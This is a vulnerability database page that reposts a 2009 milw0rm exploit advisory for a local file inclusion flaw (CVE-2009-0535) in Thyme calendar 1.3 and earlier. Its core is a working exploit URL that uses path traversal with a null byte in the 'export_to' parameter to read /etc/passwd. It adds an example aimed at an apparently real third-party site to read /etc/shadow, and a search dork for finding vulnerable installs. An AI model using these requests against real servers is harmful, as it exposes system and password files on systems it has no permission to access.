Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2009-0535

Publish Date: 10 Feb 2009

Author: cheverok

                [*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Theme Local File Inclusion / (Register_globals: off) |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Version: &lt;= 1.3 |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Dork: Thyme 1. Â© 2006 eXtrovert Software LLC. All rights reserved |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
 | Founded by: cheverok[at]gmail.com |
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]

--------------------------------------------------------------------------------------
  Intro:

See info

  http://host/patch/phpinfo.php
   
   
if register_globals Off, then

---------------------------------------------------------------------------------------
  Exploit:
   
  http://host/patch/modules/sync/export.php?export_to=../../../../../../../../../../../etc/passwd%00


---------------------------------------------------------------------------------------
  Example:


  http://www.cbpool.org/thyme/modules/sync/export.php?export_to=../../../../../../../../../../../etc/shadow%00

----------------------------------------------------------------------------------------
(c) cheverok, 10.2.2009 greetz to antichat  

# milw0rm.com [2009-02-10]

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Thyme 1.3 - 'export_to' Local File Inclusion

Vulmon Search

About

Products

Connect